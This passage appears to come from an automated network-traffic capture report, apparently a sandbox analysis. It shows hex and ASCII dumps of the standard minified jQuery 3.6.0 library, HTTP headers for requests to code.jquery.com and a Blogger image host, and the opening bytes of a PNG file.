                                                                                                                    2024-11-25 18:52:41 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                    Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                    2024-11-25 18:52:41 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                    Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                    2024-11-25 18:52:41 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                    Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                    2024-11-25 18:52:41 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                    Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                    2024-11-25 18:52:41 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                    Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                    2024-11-25 18:52:41 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                    Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                    2024-11-25 18:52:41 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                    Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                    2024-11-25 18:52:41 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                    Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                    2024-11-25 18:52:41 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                    Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    13192.168.2.449799151.101.66.1374432304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:43 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                    Host: code.jquery.com
                                                                                                                    Connection: keep-alive
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    Accept: */*
                                                                                                                    Sec-Fetch-Site: none
                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    2024-11-25 18:52:44 UTC613INHTTP/1.1 200 OK
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 89501
                                                                                                                    Server: nginx
                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                    ETag: "28feccc0-15d9d"
                                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Date: Mon, 25 Nov 2024 18:52:43 GMT
                                                                                                                    Age: 2542839
                                                                                                                    X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740063-EWR
                                                                                                                    X-Cache: HIT, HIT
                                                                                                                    X-Cache-Hits: 5889, 2
                                                                                                                    X-Timer: S1732560764.873729,VS0,VE0
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    2024-11-25 18:52:44 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                    2024-11-25 18:52:44 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                    Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                    2024-11-25 18:52:44 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                    Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                    2024-11-25 18:52:44 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                    Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                    2024-11-25 18:52:44 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                    Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                    2024-11-25 18:52:44 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                    Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    14192.168.2.449801142.250.181.654432304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:52:44 UTC918OUTGET /img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png HTTP/1.1
                                                                                                                    Host: blogger.googleusercontent.com
                                                                                                                    Connection: keep-alive
                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                    Referer: https://j9.valcondunar.com/
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    2024-11-25 18:52:45 UTC470INHTTP/1.1 200 OK
                                                                                                                    Content-Type: image/png
                                                                                                                    Vary: Origin
                                                                                                                    Access-Control-Expose-Headers: Content-Length
                                                                                                                    ETag: "v367e"
                                                                                                                    Expires: Tue, 26 Nov 2024 18:52:45 GMT
                                                                                                                    Cache-Control: public, max-age=86400, no-transform
                                                                                                                    Content-Disposition: inline;filename="userinter.png"
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Date: Mon, 25 Nov 2024 18:52:45 GMT
                                                                                                                    Server: fife
                                                                                                                    Content-Length: 87859
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close
                                                                                                                    2024-11-25 18:52:45 UTC920INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 0d 44 00 00 07 80 08 02 00 00 00 33 3b 2b ce 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 5f 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 e3 4a 4f cd 4b 2d ca 4c 56 28 28 ca 4f cb cc 49 e5 52 00 03 63 13 2e 13 4b 13 4b a3 44 03 03 03 0b 03 08 30 34 30 30 36 04 92 46 40 b6 39 54 28 d1 00 05 98 98 9b a5 01 a1 b9 59 b2 99 29 88 cf 05 00 4f ba 15 68 1b 2d d8 8c 00 00 20 00 49 44 41 54 78 9c ec da 21 01 00 20 00 c0 30 a0 7f 58 04 02 49 8c 0b b6 04 0f f0 b9 cf 1d 00 00 00 00 00 00 00 00 00 40 67 d5 01 00 00 00 00 00 00 00 00 00 f0 3b 33 1f 00 00 00 00 00 00 00 00 00 c4 cc 7c 00 00 00 00 00 00 00 00 00 10 33 f3 01 00 00 00 00 00 00 00 00 40 cc cc 07 00 00 00
                                                                                                                    Data Ascii: PNGIHDRD3;+sBITO_zTXtRaw profile type APP1JOK-LV((OIRc.KKD04006F@9T(Y)Oh- IDATx! 0XI@g;3|3@
